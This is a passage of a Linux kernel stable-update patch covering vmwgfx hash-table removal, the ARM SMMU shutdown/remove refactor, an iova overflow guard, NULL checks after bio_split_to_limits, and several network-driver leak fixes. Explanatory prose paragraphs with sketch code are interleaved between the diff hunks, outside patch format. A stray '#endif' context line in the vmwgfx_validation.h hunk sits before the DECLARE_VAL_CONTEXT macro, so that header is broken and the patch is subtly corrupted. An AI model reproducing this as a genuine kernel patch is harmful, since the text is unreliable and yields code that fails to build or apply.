+-int vmwgfx_ht_just_insert_please(struct vmwgfx_open_hash *ht, struct vmwgfx_hash_item *item,
+-				 unsigned long seed, int bits, int shift,
+-				 unsigned long add);
+-int vmwgfx_ht_find_item(struct vmwgfx_open_hash *ht, unsigned long key,
+-			struct vmwgfx_hash_item **item);
+-
+-void vmwgfx_ht_verbose_list(struct vmwgfx_open_hash *ht, unsigned long key);
+-int vmwgfx_ht_remove_key(struct vmwgfx_open_hash *ht, unsigned long key);
+-int vmwgfx_ht_remove_item(struct vmwgfx_open_hash *ht, struct vmwgfx_hash_item *item);
+-void vmwgfx_ht_remove(struct vmwgfx_open_hash *ht);
+-
+-/*
+- * RCU-safe interface
+- *
+- * The user of this API needs to make sure that two or more instances of the
+- * hash table manipulation functions are never run simultaneously.
+- * The lookup function vmwgfx_ht_find_item_rcu may, however, run simultaneously
+- * with any of the manipulation functions as long as it's called from within
+- * an RCU read-locked section.
+- */
+-#define vmwgfx_ht_insert_item_rcu vmwgfx_ht_insert_item
+-#define vmwgfx_ht_just_insert_please_rcu vmwgfx_ht_just_insert_please
+-#define vmwgfx_ht_remove_key_rcu vmwgfx_ht_remove_key
+-#define vmwgfx_ht_remove_item_rcu vmwgfx_ht_remove_item
+-#define vmwgfx_ht_find_item_rcu vmwgfx_ht_find_item
+-
+-#endif
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_resource.c b/drivers/gpu/drm/vmwgfx/vmwgfx_resource.c
+index f66caa540e146..c7d645e5ec7bf 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_resource.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_resource.c
+@@ -281,39 +281,6 @@ out_bad_resource:
+ 	return ret;
+ }
+ 
+-/**
+- * vmw_user_resource_noref_lookup_handle - lookup a struct resource from a
+- * TTM user-space handle and perform basic type checks
+- *
+- * @dev_priv:     Pointer to a device private struct
+- * @tfile:        Pointer to a struct ttm_object_file identifying the caller
+- * @handle:       The TTM user-space handle
+- * @converter:    Pointer to an object describing the resource type
+- *
+- * If the handle can't be found or is associated with an incorrect resource
+- * type, -EINVAL will be returned.
+- */
+-struct vmw_resource *
+-vmw_user_resource_noref_lookup_handle(struct vmw_private *dev_priv,
+-				      struct ttm_object_file *tfile,
+-				      uint32_t handle,
+-				      const struct vmw_user_resource_conv
+-				      *converter)
+-{
+-	struct ttm_base_object *base;
+-
+-	base = ttm_base_object_noref_lookup(tfile, handle);
+-	if (!base)
+-		return ERR_PTR(-ESRCH);
+-
+-	if (unlikely(ttm_base_object_type(base) != converter->object_type)) {
+-		ttm_base_object_noref_release();
+-		return ERR_PTR(-EINVAL);
+-	}
+-
+-	return converter->base_obj_to_res(base);
+-}
+-
+ /*
+  * Helper function that looks up either a surface or a bo.
+  *
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_validation.c b/drivers/gpu/drm/vmwgfx/vmwgfx_validation.c
+index f46891012be30..f5c4a40fb16d7 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_validation.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_validation.c
+@@ -1,7 +1,7 @@
+ // SPDX-License-Identifier: GPL-2.0 OR MIT
+ /**************************************************************************
+  *
+- * Copyright © 2018 VMware, Inc., Palo Alto, CA., USA
++ * Copyright © 2018 - 2022 VMware, Inc., Palo Alto, CA., USA
+  * All Rights Reserved.
+  *
+  * Permission is hereby granted, free of charge, to any person obtaining a
+@@ -180,11 +180,16 @@ vmw_validation_find_bo_dup(struct vmw_validation_context *ctx,
+ 	if (!ctx->merge_dups)
+ 		return NULL;
+ 
+-	if (ctx->ht) {
++	if (ctx->sw_context) {
+ 		struct vmwgfx_hash_item *hash;
++		unsigned long key = (unsigned long) vbo;
+ 
+-		if (!vmwgfx_ht_find_item(ctx->ht, (unsigned long) vbo, &hash))
+-			bo_node = container_of(hash, typeof(*bo_node), hash);
++		hash_for_each_possible_rcu(ctx->sw_context->res_ht, hash, head, key) {
++			if (hash->key == key) {
++				bo_node = container_of(hash, typeof(*bo_node), hash);
++				break;
++			}
++		}
+ 	} else {
+ 		struct  vmw_validation_bo_node *entry;
+ 
+@@ -217,11 +222,16 @@ vmw_validation_find_res_dup(struct vmw_validation_context *ctx,
+ 	if (!ctx->merge_dups)
+ 		return NULL;
+ 
+-	if (ctx->ht) {
++	if (ctx->sw_context) {
+ 		struct vmwgfx_hash_item *hash;
++		unsigned long key = (unsigned long) res;
+ 
+-		if (!vmwgfx_ht_find_item(ctx->ht, (unsigned long) res, &hash))
+-			res_node = container_of(hash, typeof(*res_node), hash);
++		hash_for_each_possible_rcu(ctx->sw_context->res_ht, hash, head, key) {
++			if (hash->key == key) {
++				res_node = container_of(hash, typeof(*res_node), hash);
++				break;
++			}
++		}
+ 	} else {
+ 		struct  vmw_validation_res_node *entry;
+ 
+@@ -269,20 +279,15 @@ int vmw_validation_add_bo(struct vmw_validation_context *ctx,
+ 		}
+ 	} else {
+ 		struct ttm_validate_buffer *val_buf;
+-		int ret;
+ 
+ 		bo_node = vmw_validation_mem_alloc(ctx, sizeof(*bo_node));
+ 		if (!bo_node)
+ 			return -ENOMEM;
+ 
+-		if (ctx->ht) {
++		if (ctx->sw_context) {
+ 			bo_node->hash.key = (unsigned long) vbo;
+-			ret = vmwgfx_ht_insert_item(ctx->ht, &bo_node->hash);
+-			if (ret) {
+-				DRM_ERROR("Failed to initialize a buffer "
+-					  "validation entry.\n");
+-				return ret;
+-			}
++			hash_add_rcu(ctx->sw_context->res_ht, &bo_node->hash.head,
++				bo_node->hash.key);
+ 		}
+ 		val_buf = &bo_node->base;
+ 		val_buf->bo = ttm_bo_get_unless_zero(&vbo->base);
+@@ -316,7 +321,6 @@ int vmw_validation_add_resource(struct vmw_validation_context *ctx,
+ 				bool *first_usage)
+ {
+ 	struct vmw_validation_res_node *node;
+-	int ret;
+ 
+ 	node = vmw_validation_find_res_dup(ctx, res);
+ 	if (node) {
+@@ -330,14 +334,9 @@ int vmw_validation_add_resource(struct vmw_validation_context *ctx,
+ 		return -ENOMEM;
+ 	}
+ 
+-	if (ctx->ht) {
++	if (ctx->sw_context) {
+ 		node->hash.key = (unsigned long) res;
+-		ret = vmwgfx_ht_insert_item(ctx->ht, &node->hash);
+-		if (ret) {
+-			DRM_ERROR("Failed to initialize a resource validation "
+-				  "entry.\n");
+-			return ret;
+-		}
++		hash_add_rcu(ctx->sw_context->res_ht, &node->hash.head, node->hash.key);
+ 	}
+ 	node->res = vmw_resource_reference_unless_doomed(res);
+ 	if (!node->res)
+@@ -681,19 +680,19 @@ void vmw_validation_drop_ht(struct vmw_validation_context *ctx)
+ 	struct vmw_validation_bo_node *entry;
+ 	struct vmw_validation_res_node *val;
+ 
+-	if (!ctx->ht)
++	if (!ctx->sw_context)
+ 		return;
+ 
+ 	list_for_each_entry(entry, &ctx->bo_list, base.head)
+-		(void) vmwgfx_ht_remove_item(ctx->ht, &entry->hash);
++		hash_del_rcu(&entry->hash.head);
+ 
+ 	list_for_each_entry(val, &ctx->resource_list, head)
+-		(void) vmwgfx_ht_remove_item(ctx->ht, &val->hash);
++		hash_del_rcu(&val->hash.head);
+ 
+ 	list_for_each_entry(val, &ctx->resource_ctx_list, head)
+-		(void) vmwgfx_ht_remove_item(ctx->ht, &val->hash);
++		hash_del_rcu(&val->hash.head);
+ 
+-	ctx->ht = NULL;
++	ctx->sw_context = NULL;
+ }
+ 
+ /**
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_validation.h b/drivers/gpu/drm/vmwgfx/vmwgfx_validation.h
+index f21df053882ba..ab9ec226f433a 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_validation.h
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_validation.h
+@@ -1,7 +1,7 @@
+ /* SPDX-License-Identifier: GPL-2.0 OR MIT */
+ /**************************************************************************
+  *
+- * Copyright © 2018 VMware, Inc., Palo Alto, CA., USA
++ * Copyright © 2018 - 2022 VMware, Inc., Palo Alto, CA., USA
+  * All Rights Reserved.
+  *
+  * Permission is hereby granted, free of charge, to any person obtaining a
+@@ -29,12 +29,11 @@
+ #define _VMWGFX_VALIDATION_H_
+ 
+ #include <linux/list.h>
++#include <linux/hashtable.h>
+ #include <linux/ww_mutex.h>
+ 
+ #include <drm/ttm/ttm_execbuf_util.h>
+ 
+-#include "vmwgfx_hashtab.h"
+-
+ #define VMW_RES_DIRTY_NONE 0
+ #define VMW_RES_DIRTY_SET BIT(0)
+ #define VMW_RES_DIRTY_CLEAR BIT(1)
+@@ -59,7 +58,7 @@
+  * @total_mem: Amount of reserved memory.
+  */
+ struct vmw_validation_context {
+-	struct vmwgfx_open_hash *ht;
++	struct vmw_sw_context *sw_context;
+ 	struct list_head resource_list;
+ 	struct list_head resource_ctx_list;
+ 	struct list_head bo_list;
+@@ -82,16 +81,16 @@ struct vmw_fence_obj;
+ /**
+  * DECLARE_VAL_CONTEXT - Declare a validation context with initialization
+  * @_name: The name of the variable
+- * @_ht: The hash table used to find dups or NULL if none
++ * @_sw_context: Contains the hash table used to find dups or NULL if none
+  * @_merge_dups: Whether to merge duplicate buffer object- or resource
+  * entries. If set to true, ideally a hash table pointer should be supplied
+  * as well unless the number of resources and buffer objects per validation
+  * is known to be very small
+  */
+ #endif
+-#define DECLARE_VAL_CONTEXT(_name, _ht, _merge_dups)			\
++#define DECLARE_VAL_CONTEXT(_name, _sw_context, _merge_dups)		\
+ 	struct vmw_validation_context _name =				\
+-	{ .ht = _ht,							\
++	{ .sw_context = _sw_context,					\
+ 	  .resource_list = LIST_HEAD_INIT((_name).resource_list),	\
+ 	  .resource_ctx_list = LIST_HEAD_INIT((_name).resource_ctx_list), \
+ 	  .bo_list = LIST_HEAD_INIT((_name).bo_list),			\
+@@ -114,19 +113,6 @@ vmw_validation_has_bos(struct vmw_validation_context *ctx)
+ 	return !list_empty(&ctx->bo_list);
+ }
+ 
+-/**
+- * vmw_validation_set_ht - Register a hash table for duplicate finding
+- * @ctx: The validation context
+- * @ht: Pointer to a hash table to use for duplicate finding
+- * This function is intended to be used if the hash table wasn't
+- * available at validation context declaration time
+- */
+-static inline void vmw_validation_set_ht(struct vmw_validation_context *ctx,
+-					 struct vmwgfx_open_hash *ht)
+-{
+-	ctx->ht = ht;
+-}
+-
+ /**
+  * vmw_validation_bo_reserve - Reserve buffer objects registered with a
+  * validation context
+diff --git a/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c b/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c
+index 6d5df91c5c465..d4d8bfee9febc 100644
+--- a/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c
++++ b/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c
+@@ -3854,7 +3854,9 @@ static int arm_smmu_device_remove(struct platform_device *pdev)
+ 
+ static void arm_smmu_device_shutdown(struct platform_device *pdev)
+ {
+-	arm_smmu_device_remove(pdev);
++	struct arm_smmu_device *smmu = platform_get_drvdata(pdev);
++
++	arm_smmu_device_disable(smmu);
+ }
+ 
+ static const struct of_device_id arm_smmu_of_match[] = {
+diff --git a/drivers/iommu/arm/arm-smmu/arm-smmu.c b/drivers/iommu/arm/arm-smmu/arm-smmu.c
+index 30dab1418e3ff..f38b54a887678 100644
+--- a/drivers/iommu/arm/arm-smmu/arm-smmu.c
++++ b/drivers/iommu/arm/arm-smmu/arm-smmu.c
+@@ -1319,8 +1319,14 @@ static bool arm_smmu_capable(struct device *dev, enum iommu_cap cap)
+ 
+ 	switch (cap) {
+ 	case IOMMU_CAP_CACHE_COHERENCY:
+-		/* Assume that a coherent TCU implies coherent TBUs */
+-		return cfg->smmu->features & ARM_SMMU_FEAT_COHERENT_WALK;
++		/*
++		 * It's overwhelmingly the case in practice that when the pagetable
++		 * walk interface is connected to a coherent interconnect, all the
++		 * translation interfaces are too. Furthermore if the device is
++		 * natively coherent, then its translation interface must also be.
++		 */
++		return cfg->smmu->features & ARM_SMMU_FEAT_COHERENT_WALK ||
++			device_get_dma_attr(dev) == DEV_DMA_COHERENT;
+ 	case IOMMU_CAP_NOEXEC:
+ 		return true;
+ 	default:
+@@ -2188,19 +2194,16 @@ static int arm_smmu_device_probe(struct platform_device *pdev)
+ 	return 0;
+ }
+ 
+-static int arm_smmu_device_remove(struct platform_device *pdev)
++static void arm_smmu_device_shutdown(struct platform_device *pdev)
+ {
+ 	struct arm_smmu_device *smmu = platform_get_drvdata(pdev);
+ 
+ 	if (!smmu)
+-		return -ENODEV;
++		return;
+ 
+ 	if (!bitmap_empty(smmu->context_map, ARM_SMMU_MAX_CBS))
+ 		dev_notice(&pdev->dev, "disabling translation\n");
+ 
+-	iommu_device_unregister(&smmu->iommu);
+-	iommu_device_sysfs_remove(&smmu->iommu);
+-
+ 	arm_smmu_rpm_get(smmu);
+ 	/* Turn the thing off */
+ 	arm_smmu_gr0_write(smmu, ARM_SMMU_GR0_sCR0, ARM_SMMU_sCR0_CLIENTPD);
+@@ -2212,12 +2215,21 @@ static int arm_smmu_device_remove(struct platform_device *pdev)
+ 		clk_bulk_disable(smmu->num_clks, smmu->clks);
+ 
+ 	clk_bulk_unprepare(smmu->num_clks, smmu->clks);
+-	return 0;
+ }
+ 
+-static void arm_smmu_device_shutdown(struct platform_device *pdev)
++static int arm_smmu_device_remove(struct platform_device *pdev)
+ {
+-	arm_smmu_device_remove(pdev);
++	struct arm_smmu_device *smmu = platform_get_drvdata(pdev);
++
++	if (!smmu)
++		return -ENODEV;
++
++	iommu_device_unregister(&smmu->iommu);
++	iommu_device_sysfs_remove(&smmu->iommu);
++
++	arm_smmu_device_shutdown(pdev);
++
++	return 0;
+ }
+ 
+ static int __maybe_unused arm_smmu_runtime_resume(struct device *dev)
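Both SMMU drivers get the same teardown refactor: ->shutdown() now only quiesces the hardware (clients bypass or fault, clocks released), while ->remove() first unregisters the IOMMU core objects and then reuses the shutdown path. Reboot/kexec thus no longer tears down sysfs state, and the hardware-disable code stays in one place. Roughly, with foo_* as placeholders for the driver's own helpers:

	static void foo_shutdown(struct platform_device *pdev)
	{
		struct foo *f = platform_get_drvdata(pdev);

		if (f)
			foo_hw_disable(f);	/* all that reboot/kexec needs */
	}

	static int foo_remove(struct platform_device *pdev)
	{
		struct foo *f = platform_get_drvdata(pdev);

		if (!f)
			return -ENODEV;

		foo_unregister(f);	/* software teardown on real unbind only */
		foo_shutdown(pdev);
		return 0;
	}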
+diff --git a/drivers/iommu/iova.c b/drivers/iommu/iova.c
+index a44ad92fc5eb7..fe452ce466429 100644
+--- a/drivers/iommu/iova.c
++++ b/drivers/iommu/iova.c
+@@ -197,7 +197,7 @@ static int __alloc_and_insert_iova_range(struct iova_domain *iovad,
+ 
+ 	curr = __get_cached_rbnode(iovad, limit_pfn);
+ 	curr_iova = to_iova(curr);
+-	retry_pfn = curr_iova->pfn_hi + 1;
++	retry_pfn = curr_iova->pfn_hi;
+ 
+ retry:
+ 	do {
+@@ -211,7 +211,7 @@ retry:
+ 	if (high_pfn < size || new_pfn < low_pfn) {
+ 		if (low_pfn == iovad->start_pfn && retry_pfn < limit_pfn) {
+ 			high_pfn = limit_pfn;
+-			low_pfn = retry_pfn;
++			low_pfn = retry_pfn + 1;
+ 			curr = iova_find_limit(iovad, limit_pfn);
+ 			curr_iova = to_iova(curr);
+ 			goto retry;
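The iova change is an overflow guard: caching `pfn_hi + 1` wraps to 0 when the cached node ends at the very top of the address space, which makes the later `retry_pfn < limit_pfn` test pass spuriously. Storing the unincremented pfn_hi and applying the +1 only at the retry site keeps the comparison meaningful. Illustration only, not driver code:

	unsigned long pfn_hi = ULONG_MAX;

	/* old: retry_pfn = pfn_hi + 1 wraps to 0, so
	 * "retry_pfn < limit_pfn" held even with no room left
	 */

	/* new: compare pfn_hi itself first, then restart the
	 * search from pfn_hi + 1 only once the check has passed
	 */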
+diff --git a/drivers/iommu/mtk_iommu_v1.c b/drivers/iommu/mtk_iommu_v1.c
+index 6e0e65831eb70..a978220eb620e 100644
+--- a/drivers/iommu/mtk_iommu_v1.c
++++ b/drivers/iommu/mtk_iommu_v1.c
+@@ -685,7 +685,7 @@ static int mtk_iommu_v1_probe(struct platform_device *pdev)
+ 	ret = iommu_device_sysfs_add(&data->iommu, &pdev->dev, NULL,
+ 				     dev_name(&pdev->dev));
+ 	if (ret)
+-		return ret;
++		goto out_clk_unprepare;
+ 
+ 	ret = iommu_device_register(&data->iommu, &mtk_iommu_v1_ops, dev);
+ 	if (ret)
+@@ -700,6 +700,8 @@ out_dev_unreg:
+ 	iommu_device_unregister(&data->iommu);
+ out_sysfs_remove:
+ 	iommu_device_sysfs_remove(&data->iommu);
++out_clk_unprepare:
++	clk_disable_unprepare(data->bclk);
+ 	return ret;
+ }
+ 
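The mtk_iommu_v1 fix completes the probe unwind ladder: a failure in iommu_device_sysfs_add() previously returned without releasing the clock prepared earlier, so a new out_clk_unprepare label joins the chain. The general shape, with register_a/register_b/unregister_a as placeholders:

	static int foo_probe(struct clk *clk)
	{
		int ret = clk_prepare_enable(clk);

		if (ret)
			return ret;

		ret = register_a();
		if (ret)
			goto out_clk;

		ret = register_b();
		if (ret)
			goto out_a;

		return 0;

	out_a:
		unregister_a();
	out_clk:
		clk_disable_unprepare(clk);
		return ret;
	}

Each label undoes exactly the steps that succeeded before the jump, in reverse order.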
+diff --git a/drivers/md/dm.c b/drivers/md/dm.c
+index e30c2d2bc9c78..d49809e9db96e 100644
+--- a/drivers/md/dm.c
++++ b/drivers/md/dm.c
+@@ -1755,6 +1755,8 @@ static void dm_split_and_process_bio(struct mapped_device *md,
+ 		 * otherwise associated queue_limits won't be imposed.
+ 		 */
+ 		bio = bio_split_to_limits(bio);
++		if (!bio)
++			return;
+ 	}
+ 
+ 	init_clone_info(&ci, md, map, bio, is_abnormal);
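This hunk and the md, nvme-multipath and s390 dcssblk hunks further down are the same caller-side fix: bio_split_to_limits() can return NULL once it has already completed or re-queued the bio, and a caller that keeps going would touch a bio it no longer owns. The pattern every affected submit path needs, as a sketch:

	static void foo_submit_bio(struct bio *bio)
	{
		bio = bio_split_to_limits(bio);
		if (!bio)
			return;	/* already handled; nothing left to submit */

		/* ... carry on with the (possibly trimmed) bio ... */
	}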
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index fd82881761d34..b911085060dc3 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -443,6 +443,8 @@ static void md_submit_bio(struct bio *bio)
+ 	}
+ 
+ 	bio = bio_split_to_limits(bio);
++	if (!bio)
++		return;
+ 
+ 	if (mddev->ro == 1 && unlikely(rw == WRITE)) {
+ 		if (bio_sectors(bio) != 0)
+diff --git a/drivers/mtd/parsers/scpart.c b/drivers/mtd/parsers/scpart.c
+index 02601bb33de4e..6e5e11c37078f 100644
+--- a/drivers/mtd/parsers/scpart.c
++++ b/drivers/mtd/parsers/scpart.c
+@@ -50,7 +50,7 @@ static int scpart_scan_partmap(struct mtd_info *master, loff_t partmap_offs,
+ 	int cnt = 0;
+ 	int res = 0;
+ 	int res2;
+-	loff_t offs;
++	uint32_t offs;
+ 	size_t retlen;
+ 	struct sc_part_desc *pdesc = NULL;
+ 	struct sc_part_desc *tmpdesc;
+diff --git a/drivers/mtd/spi-nor/core.c b/drivers/mtd/spi-nor/core.c
+index 2e0655c0b606f..5dbf52aa03551 100644
+--- a/drivers/mtd/spi-nor/core.c
++++ b/drivers/mtd/spi-nor/core.c
+@@ -10,6 +10,7 @@
+ #include <linux/err.h>
+ #include <linux/errno.h>
+ #include <linux/module.h>
++#include <linux/delay.h>
+ #include <linux/device.h>
+ #include <linux/mutex.h>
+ #include <linux/math64.h>
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+index f5a8bae8d79a1..edca16b5f9e34 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+@@ -990,7 +990,7 @@ static struct sk_buff *bnxt_rx_multi_page_skb(struct bnxt *bp,
+ 			     DMA_ATTR_WEAK_ORDERING);
+ 	skb = build_skb(page_address(page), PAGE_SIZE);
+ 	if (!skb) {
+-		__free_page(page);
++		page_pool_recycle_direct(rxr->page_pool, page);
+ 		return NULL;
+ 	}
+ 	skb_mark_for_recycle(skb);
+@@ -1028,7 +1028,7 @@ static struct sk_buff *bnxt_rx_page_skb(struct bnxt *bp,
+ 
+ 	skb = napi_alloc_skb(&rxr->bnapi->napi, payload);
+ 	if (!skb) {
+-		__free_page(page);
++		page_pool_recycle_direct(rxr->page_pool, page);
+ 		return NULL;
+ 	}
+ 
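The pages on these bnxt rx paths come from a page_pool, so the failure paths must hand them back with page_pool_recycle_direct() rather than __free_page(); freeing directly bypasses the pool and corrupts its in-flight accounting. A sketch of the corrected shape (hypothetical helper):

	static struct sk_buff *rx_build_skb(struct page_pool *pool,
					    struct page *page)
	{
		struct sk_buff *skb = build_skb(page_address(page), PAGE_SIZE);

		if (!skb) {
			/* give the page back to its owner, the pool */
			page_pool_recycle_direct(pool, page);
			return NULL;
		}
		skb_mark_for_recycle(skb);
		return skb;
	}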
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
+index 081bd2c3f2891..e84e5be8e59ed 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
+@@ -3130,7 +3130,7 @@ static int hclgevf_set_channels(struct hnae3_handle *handle, u32 new_tqps_num,
+ 
+ 	hclgevf_update_rss_size(handle, new_tqps_num);
+ 
+-	hclge_comm_get_rss_tc_info(cur_rss_size, hdev->hw_tc_map,
++	hclge_comm_get_rss_tc_info(kinfo->rss_size, hdev->hw_tc_map,
+ 				   tc_offset, tc_valid, tc_size);
+ 	ret = hclge_comm_set_rss_tc_mode(&hdev->hw.hw, tc_offset,
+ 					 tc_valid, tc_size);
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_main.c b/drivers/net/ethernet/intel/iavf/iavf_main.c
+index f71e132ede094..260c55951c287 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_main.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_main.c
+@@ -3850,7 +3850,7 @@ static int iavf_parse_cls_flower(struct iavf_adapter *adapter,
+ 				field_flags |= IAVF_CLOUD_FIELD_IIP;
+ 			} else {
+ 				dev_err(&adapter->pdev->dev, "Bad ip src mask 0x%08x\n",
+-					be32_to_cpu(match.mask->dst));
++					be32_to_cpu(match.mask->src));
+ 				return -EINVAL;
+ 			}
+ 		}
+diff --git a/drivers/net/ethernet/intel/ice/ice_gnss.c b/drivers/net/ethernet/intel/ice/ice_gnss.c
+index b5a7f246d230f..43e199b5b513b 100644
+--- a/drivers/net/ethernet/intel/ice/ice_gnss.c
++++ b/drivers/net/ethernet/intel/ice/ice_gnss.c
+@@ -363,6 +363,7 @@ ice_gnss_tty_write(struct tty_struct *tty, const unsigned char *buf, int count)
+ 	/* Send the data out to a hardware port */
+ 	write_buf = kzalloc(sizeof(*write_buf), GFP_KERNEL);
+ 	if (!write_buf) {
++		kfree(cmd_buf);
+ 		err = -ENOMEM;
+ 		goto exit;
+ 	}
+@@ -460,6 +461,9 @@ static struct tty_driver *ice_gnss_create_tty_driver(struct ice_pf *pf)
+ 	for (i = 0; i < ICE_GNSS_TTY_MINOR_DEVICES; i++) {
+ 		pf->gnss_tty_port[i] = kzalloc(sizeof(*pf->gnss_tty_port[i]),
+ 					       GFP_KERNEL);
++		if (!pf->gnss_tty_port[i])
++			goto err_out;
++
+ 		pf->gnss_serial[i] = NULL;
+ 
+ 		tty_port_init(pf->gnss_tty_port[i]);
+@@ -469,21 +473,23 @@ static struct tty_driver *ice_gnss_create_tty_driver(struct ice_pf *pf)
+ 	err = tty_register_driver(tty_driver);
+ 	if (err) {
+ 		dev_err(dev, "Failed to register TTY driver err=%d\n", err);
+-
+-		for (i = 0; i < ICE_GNSS_TTY_MINOR_DEVICES; i++) {
+-			tty_port_destroy(pf->gnss_tty_port[i]);
+-			kfree(pf->gnss_tty_port[i]);
+-		}
+-		kfree(ttydrv_name);
+-		tty_driver_kref_put(pf->ice_gnss_tty_driver);
+-
+-		return NULL;
++		goto err_out;
+ 	}
+ 
+ 	for (i = 0; i < ICE_GNSS_TTY_MINOR_DEVICES; i++)
+ 		dev_info(dev, "%s%d registered\n", ttydrv_name, i);
+ 
+ 	return tty_driver;
++
++err_out:
++	while (i--) {
++		tty_port_destroy(pf->gnss_tty_port[i]);
++		kfree(pf->gnss_tty_port[i]);
++	}
++	kfree(ttydrv_name);
++	tty_driver_kref_put(pf->ice_gnss_tty_driver);
++
++	return NULL;
+ }
+ 
+ /**
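Two fixes in one here: the write path frees cmd_buf on the allocation failure it previously leaked, and the tty setup gains the missing kzalloc NULL check plus a shared err_out unwind. The `while (i--)` idiom under the label releases only the entries that were actually initialized; a sketch, omitting the driver-name and kref cleanup the real function also does:

	static int init_ports(struct tty_port **ports, int n)
	{
		int i;

		for (i = 0; i < n; i++) {
			ports[i] = kzalloc(sizeof(**ports), GFP_KERNEL);
			if (!ports[i])
				goto err_out;
			tty_port_init(ports[i]);
		}
		return 0;

	err_out:
		while (i--) {	/* walks back over 0..i-1 only */
			tty_port_destroy(ports[i]);
			kfree(ports[i]);
		}
		return -ENOMEM;
	}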
+diff --git a/drivers/net/ethernet/intel/igc/igc_defines.h b/drivers/net/ethernet/intel/igc/igc_defines.h
+index 4ad35fbdc02e8..dbfa4b9dee066 100644
+--- a/drivers/net/ethernet/intel/igc/igc_defines.h
++++ b/drivers/net/ethernet/intel/igc/igc_defines.h
+@@ -466,7 +466,9 @@
+ #define IGC_TSAUXC_EN_TT0	BIT(0)  /* Enable target time 0. */
+ #define IGC_TSAUXC_EN_TT1	BIT(1)  /* Enable target time 1. */
+ #define IGC_TSAUXC_EN_CLK0	BIT(2)  /* Enable Configurable Frequency Clock 0. */
++#define IGC_TSAUXC_ST0		BIT(4)  /* Start Clock 0 Toggle on Target Time 0. */
+ #define IGC_TSAUXC_EN_CLK1	BIT(5)  /* Enable Configurable Frequency Clock 1. */
++#define IGC_TSAUXC_ST1		BIT(7)  /* Start Clock 1 Toggle on Target Time 1. */
+ #define IGC_TSAUXC_EN_TS0	BIT(8)  /* Enable hardware timestamp 0. */
+ #define IGC_TSAUXC_AUTT0	BIT(9)  /* Auxiliary Timestamp Taken. */
+ #define IGC_TSAUXC_EN_TS1	BIT(10) /* Enable hardware timestamp 0. */
+diff --git a/drivers/net/ethernet/intel/igc/igc_ptp.c b/drivers/net/ethernet/intel/igc/igc_ptp.c
+index 8dbb9f903ca70..c34734d432e0d 100644
+--- a/drivers/net/ethernet/intel/igc/igc_ptp.c
++++ b/drivers/net/ethernet/intel/igc/igc_ptp.c
+@@ -322,7 +322,7 @@ static int igc_ptp_feature_enable_i225(struct ptp_clock_info *ptp,
+ 		ts = ns_to_timespec64(ns);
+ 		if (rq->perout.index == 1) {
+ 			if (use_freq) {
+-				tsauxc_mask = IGC_TSAUXC_EN_CLK1;
++				tsauxc_mask = IGC_TSAUXC_EN_CLK1 | IGC_TSAUXC_ST1;
+ 				tsim_mask = 0;
+ 			} else {
+ 				tsauxc_mask = IGC_TSAUXC_EN_TT1;
+@@ -333,7 +333,7 @@ static int igc_ptp_feature_enable_i225(struct ptp_clock_info *ptp,
+ 			freqout = IGC_FREQOUT1;
+ 		} else {
+ 			if (use_freq) {
+-				tsauxc_mask = IGC_TSAUXC_EN_CLK0;
++				tsauxc_mask = IGC_TSAUXC_EN_CLK0 | IGC_TSAUXC_ST0;
+ 				tsim_mask = 0;
+ 			} else {
+ 				tsauxc_mask = IGC_TSAUXC_EN_TT0;
+@@ -347,10 +347,12 @@ static int igc_ptp_feature_enable_i225(struct ptp_clock_info *ptp,
+ 		tsauxc = rd32(IGC_TSAUXC);
+ 		tsim = rd32(IGC_TSIM);
+ 		if (rq->perout.index == 1) {
+-			tsauxc &= ~(IGC_TSAUXC_EN_TT1 | IGC_TSAUXC_EN_CLK1);
++			tsauxc &= ~(IGC_TSAUXC_EN_TT1 | IGC_TSAUXC_EN_CLK1 |
++				    IGC_TSAUXC_ST1);
+ 			tsim &= ~IGC_TSICR_TT1;
+ 		} else {
+-			tsauxc &= ~(IGC_TSAUXC_EN_TT0 | IGC_TSAUXC_EN_CLK0);
++			tsauxc &= ~(IGC_TSAUXC_EN_TT0 | IGC_TSAUXC_EN_CLK0 |
++				    IGC_TSAUXC_ST0);
+ 			tsim &= ~IGC_TSICR_TT0;
+ 		}
+ 		if (on) {
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_phy.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_phy.c
+index 24aa97f993ca1..123dca9ce4683 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_phy.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_phy.c
+@@ -855,9 +855,11 @@ static struct pci_dev *ixgbe_get_first_secondary_devfn(unsigned int devfn)
+ 	rp_pdev = pci_get_domain_bus_and_slot(0, 0, devfn);
+ 	if (rp_pdev && rp_pdev->subordinate) {
+ 		bus = rp_pdev->subordinate->number;
++		pci_dev_put(rp_pdev);
+ 		return pci_get_domain_bus_and_slot(0, bus, 0);
+ 	}
+ 
++	pci_dev_put(rp_pdev);
+ 	return NULL;
+ }
+ 
+@@ -874,6 +876,7 @@ static bool ixgbe_x550em_a_has_mii(struct ixgbe_hw *hw)
+ 	struct ixgbe_adapter *adapter = hw->back;
